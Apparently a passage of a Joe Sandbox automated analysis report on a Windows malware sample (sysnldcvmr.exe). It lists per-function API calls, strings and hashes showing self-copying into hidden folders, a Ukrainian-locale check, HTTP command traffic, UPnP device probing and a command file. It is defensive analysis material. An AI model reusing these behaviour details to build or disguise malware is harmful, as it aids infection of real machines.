                                                                                                                    • wsprintfW.USER32 ref: 0040672F
                                                                                                                    • wsprintfW.USER32 ref: 0040674F
                                                                                                                    • wsprintfW.USER32 ref: 00406768
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406778
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004067BE
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067CB
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067E0
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00406803
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406810
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406843
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
                                                                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$C:\Windows\sysnldcvmr.exe$shell32.dll$shell32.dll
                                                                                                                    • API String ID: 2467965697-1186605320
                                                                                                                    • Opcode ID: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                                                                    • Instruction ID: f76dd7f444767b2c43f85b167d980272eeebb95a9fd79305f50fc2a4155965b0
                                                                                                                    • Opcode Fuzzy Hash: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                                                                    • Instruction Fuzzy Hash: BFD162B5900258ABCB20DF50DC44BEA77B8BB48304F0485EAF60AE6191D7B99BD4CF59
                                                                                                                    Function 00406570 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
                                                                                                                    • wsprintfW.USER32 ref: 00406595
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004065AC
                                                                                                                    • lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
                                                                                                                    • lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
                                                                                                                    • wsprintfW.USER32 ref: 0040660A
                                                                                                                    • wsprintfW.USER32 ref: 0040662A
                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040668F
                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00406699
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                    • String ID: %s\%s$%s\%s$%s\*$ok@
                                                                                                                    • API String ID: 92872011-32713442
                                                                                                                    • Opcode ID: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                                                                    • Instruction ID: 6b6780eb73bc58f0ce40e07c43f053b4d902fc918dfc6bbc5558198ff1b4ac31
                                                                                                                    • Opcode Fuzzy Hash: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                                                                    • Instruction Fuzzy Hash: AB3127B5900218AFCB10DB60EC89FDA7778BB48701F4085A9F609A3195DB75DAD4CF58
                                                                                                                    Function 0040F0B1 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040F162
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                    • String ID: oA$ oA$ oA
                                                                                                                    • API String ID: 2850889275-3725432611
                                                                                                                    • Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                                                                    • Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
                                                                                                                    • Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                                                                    • Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C
                                                                                                                    Function 0040E730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
                                                                                                                    • strcmp.NTDLL ref: 0040E752
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocalestrcmp
                                                                                                                    • String ID: UKR
                                                                                                                    • API String ID: 3191669094-64918367
                                                                                                                    • Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                                                                    • Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
                                                                                                                    • Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                                                                    • Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B
                                                                                                                    Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                    • String ID: PCOI$ilci
                                                                                                                    • API String ID: 3345448188-3762367603
                                                                                                                    • Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                                                                    • Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
                                                                                                                    • Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                                                                    • Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99
                                                                                                                    Function 0040E4F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • memset.NTDLL ref: 0040E518
                                                                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
                                                                                                                    • HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E701
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E70E
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E71B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                    • API String ID: 2761394606-2217117414
                                                                                                                    • Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                                                                    • Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
                                                                                                                    • Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                                                                    • Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54
                                                                                                                    Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                    • String ID: PCOI$ilci
                                                                                                                    • API String ID: 2403999931-3762367603
                                                                                                                    • Opcode ID: 002568448c63d0a3f212006a3792e32a6b926d0b6d38af1dbe87adf1abbded14
                                                                                                                    • Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
                                                                                                                    • Opcode Fuzzy Hash: 002568448c63d0a3f212006a3792e32a6b926d0b6d38af1dbe87adf1abbded14
                                                                                                                    • Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98
                                                                                                                    Function 0040DBC0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • memset.NTDLL ref: 0040DBE8
                                                                                                                    • InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDC4
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDD1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                    • String ID: <$GET
                                                                                                                    • API String ID: 1205665004-427699995
                                                                                                                    • Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                                                                    • Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
                                                                                                                    • Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                                                                    • Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54
                                                                                                                    Function 00406060 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040CBEC,?), ref: 0040606F
                                                                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406101
                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040629D
                                                                                                                    • LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040CBEC,?), ref: 004062A8
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\tbtcmds.dat, xrefs: 00406220
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                    • String ID: C:\Users\user\tbtcmds.dat
                                                                                                                    • API String ID: 1457358591-1042172597
                                                                                                                    • Opcode ID: 83d86ba9bf43733d3f94aa7f41c6e355e6d1358f9d97233fed313ad882293440
                                                                                                                    • Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
                                                                                                                    • Opcode Fuzzy Hash: 83d86ba9bf43733d3f94aa7f41c6e355e6d1358f9d97233fed313ad882293440
                                                                                                                    • Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5
                                                                                                                    Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 671207744-0
                                                                                                                    • Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                                                                    • Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
                                                                                                                    • Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                                                                    • Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                    Function 0040E240 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                    • String ID: device$deviceType
                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                    • Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                                                                    • Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
                                                                                                                    • Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                                                                    • Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95
                                                                                                                    Function 0040E0E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                    • String ID: service$serviceType
                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                    • Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                                                                    • Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
                                                                                                                    • Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                                                                    • Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95
                                                                                                                    Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
